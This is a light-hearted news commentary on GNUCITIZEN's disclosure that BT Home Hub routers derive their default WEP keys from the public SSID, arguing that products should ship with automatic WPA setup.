The White Hatters of GNUCITIZEN have come up with a curious Wi-Fi tale – a way has been found to hack the default WEP security key on new BT Home Hub routers.
As old world as WEP might sound, this is still the most popular Internet router in the UK. The clue to the danger lies in the word ‘default’.
Apparently, a researcher has discovered that the default WEP key for every router is computed from the default SSID (the router’s name). Although the keys are all supposed to be different from hub to hub, it stands to reason that the SSID is public (again by default) and that once the algorithm gets out, anyone with an IQ above 120 can computer the range of possibilities from which the WEP key has been calculated and then come up with a force-hacking tool. In fact, the researcher has already done that, and reckons the number of keys needed to guess the correct one is as low as 80.
GNUCITIZEN has been here before with BT’s Home Hub, as readers might remember from the authentication disclosure that laid the wretched boxes of gray plastic low in January.
"We haven't received any official response from the vendor yet. However, it is our professional duty to report to the public any pending vulnerabilities. We also strongly believe that general education is the best form of defence and the only way to prevent the rise of malicious security attacks", GNUCITIZEN said in an official release.
“Oh bother chaps!” you can almost hear the BT Martlesham engineers exclaiming as they sip from mugs of lukewarm tea or inhale from smoking pipes. Time for some beard trimming. But hold on. In fairness to BT’s Home Hub, most routers come without a default key of any kind. The users is usually talked through the process of setting up a key using WPA/WPA-PSK or, failing that (if other Wi-Fi hardware really, really won’t support it), WEP.
I’m not acquainted with the precise setup for the Home Hub, but it seems unlikely to me that anyone naïve enough to use WEP would also use the default key. They’d change it and that would make almost no difference anyway because WEP is rubbish. Apparently this key is actually written down on a sticker that comes with the hub - why doesn't it assume the user needs to create their own you wonder?
The solution to all of this is to mandate an automatic WPA encryption setup routine on every product, something a few have already adopted. No messing with WEP, and no messing with anything labelled ‘default’ ever again. Nothing that could be described as ‘default’ could ever be secure, no matter what encryption system is being used.